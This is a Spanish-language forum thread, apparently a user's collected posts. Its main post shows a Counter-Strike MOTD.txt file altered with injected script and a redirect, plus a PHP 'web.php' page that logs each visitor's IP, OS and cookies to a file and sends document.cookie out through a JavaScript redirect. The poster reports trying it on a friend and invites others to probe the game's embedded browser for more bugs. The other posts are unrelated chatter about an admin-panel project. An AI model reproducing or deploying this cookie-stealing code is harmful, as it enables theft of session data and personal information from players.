Mensajes

igualmente si las cookies no las tiene, te da la info igual, asique no tiene que estar (isset)



saludos tomii!

Y loco por quien votan?

jajaja


Empiezan las votaciones!

Y loco por quien votan?

jajaja


Empiezan las votaciones!

Bueno gente,el que alguna vez tubo un server de counter strike, sabe que el archivo MOTD.txt contiene ese especie de "portada", al iniciarse en un server.

aca el code del MOTD.txt

Código (html4strict) [Seleccionar] Expandir

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
<title>Cstrike MOTD</title>
<style type="text/css">
pre {
font-family:Verdana,Tahoma;
color:#FFB000;
    }
body {
background:#000000;
margin-left:8px;
margin-top:0px;
}
a {
    text-decoration:    underline;
}
a:link  {
   color:  #FFFFFF;
   }
a:visited   {
   color:  #FFFFFF;
   }
a:active    {
   color:  #FFFFFF;
   }
a:hover {
   color:  #FFFFFF;
   text-decoration:    underline;
   }
</style>
</head>
<body scroll="no">
<pre>
You are playing Counter-Strike v1.6
Visit the official CS web site @
www.counter-strike.net
<a href="http://www.counter-strike.net">Visit Counter-Strike.net</a>
</pre>
</body>
</html>

Supongo que sabran que significara todo esto, o lo habran visto alguna vez.

Entonces dije, CARAJO, porque no me di cuenta antes, y buen empeze a "tocar" un poco todo y aqui esta el code con los cambios.

Código (html4strict) [Seleccionar] Expandir

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
<title>caca</title>
<script>alert("scripting")<script>
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://localhost/web.php?cookie=">
<style type="text/css">
pre {
font-family:Verdana,Tahoma;
color:#FFB000;
    }
body {
background:#000000;
margin-left:8px;
margin-top:0px;
}
a {
    text-decoration:    underline;
}
a:link  {
   color:  #FFFFFF;
   }
a:visited   {
   color:  #FFFFFF;
   }
a:active    {
   color:  #FFFFFF;
   }
a:hover {
   color:  #FFFFFF;
   text-decoration:    underline;
   }
</style>
</head>
<body scroll="no">
<pre>
You are playing Counter-Strike v1.6
Visit the official CS web site @
www.counter-strike.net
<a href="http://www.counter-strike.net">Visit Counter-Strike.com</a>
</pre>
</body>
</html>

le puse que se redireccione, a web.php, para sacar cookies, que todavía no me salio nose porque.

aca web.php:

Código (php) [Seleccionar] Expandir

<html>
<head>
<title>Xss re pillo</html>
</head>
<body>
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$cookie = $_GET['cookie'];
$scuandal = "ip-víctima:" . $ip . " sistema operativo:" . PHP_OS . " -Servidor :" . $_SERVER['SERVER_NAME'] . " [+] info del server: " . $_SERVER['SERVER_SOFTWARE'] . $cookie;
$fff = fopen("archivo.txt","a");
fwrite($fff, "$scuandal \n");
fclose($fff);
?>
<script>window.location='http://localhost/web.php?cookie='+document.cookie;</script>
</body>
</html>

y  , observen archivo.txt

ip-víctima:127.0.0.1 sistema operativo:WINNT -Servidor :localhost

• info del server: Apache/2.2.11 (Win32) PHP/5.3.0
  
  lo probe con un amigo y me da su info
  
  obvio que info del server va a ser mi info jajja
  
  bien se peude sacar info por php, pero ahora la gran pregunta, si tantos navegadores poseen bugs, como mozilla,IE, aunque no sea un navegador completo, seria una especie, tendria que tener bugs si son permitidos tambien estos tipos de cosas.
  
  nadie sabe donde se encuentra el "navegador", donde se carga el MOTD.txt
  
  si alguien tiene ganas de buscar, que tenga un poco mas de idea podemos sacar algo de provecho a esto.
  
  PD:Es una mezcla entre bugs y exploits a nivel web-hacking-y bugs y exploits jajaja
  
  saludos

lo lei por "arriba" asique no puedo acotar

saludos

Esta bueno, pero esto va en bugs y expliots a nivel web 


saludos

sisi, ya se que se puede hacer mas corto todo, pero es que para mi es mas organizado hacerlo con variables.

despues ya lo puse antes, el sistema NO ES PARA USARLO, ya lo avise antes es como para ver como funciona, el tema es hacerlo de 0 como lo hicimos con castg alias "tomi" ajaj, es obvio que va a tener errores podria ponerle md5 a la pass, pero como la fecha de entrega me adelanto todo y no tube tiempo ni de sacar las malas palabras en las variables.

saludos! la version 1.1 mejorara todo eso jajaj


saludos, sigan posteando sus inquietudes y/o mejoras que lo ponemos.
PD:¿Gusto el diseño?

uf, si es verdad, el admin_panel fue lo primero que hice no me fije de eso  , la proxima version depuro todooo,disculpen.


saludos!

PD:se pueden encontrar con variables como:MIe$rda, caca y cosas asi jajaja

si hay errores postearlo, estaria bueno hacer como una auditoria de los codes, del mio y de el de castg.


adios!

dale, gracias por la buena onda, si tenes problemas avisa!


saludos

Sistema de administracion Incasoft

Gente, como menciono anteriormente castg, hicimos como un sistema de administracion con "fecha de entrega", y bueno se me paso un poquito  ,pero por fin pude terminarlo, No pude ordenar el codigo, asique si ven algunas cosas repetidas, no lo digan porque ya se que me falta depurar y demas.

ahora me gustaria que verifiquen, el diesño y ademas la seguridad.

algunas fotos

Instalacion!



Esa es la parte numero dos de la instalacion.

ya logueado !



y ahora el protafolio!



PD: La seguridad esta solo hecha del usuario visitante para abajo, nose si me entienden, osea dentro del sistema de adminsitracion ya logueado , si hay problema de seguridad, si alguien tiene ganas de arreglarlo joya, pero ya el bocho no me daba mas.

tambien nose si se dieron cuenta, pero portafolio.php esta dentro de la carpeta de administracion pero bue, no es para USARLO el sistema sino para que lo prueben y vean como es.

por favor traten de bajarlo e instalarlo que costo mucho laburo, encima la instalacion es una boludes, ademas de que es muy rapida.

aca todos los codes:

Codigo del sistema!

saludos!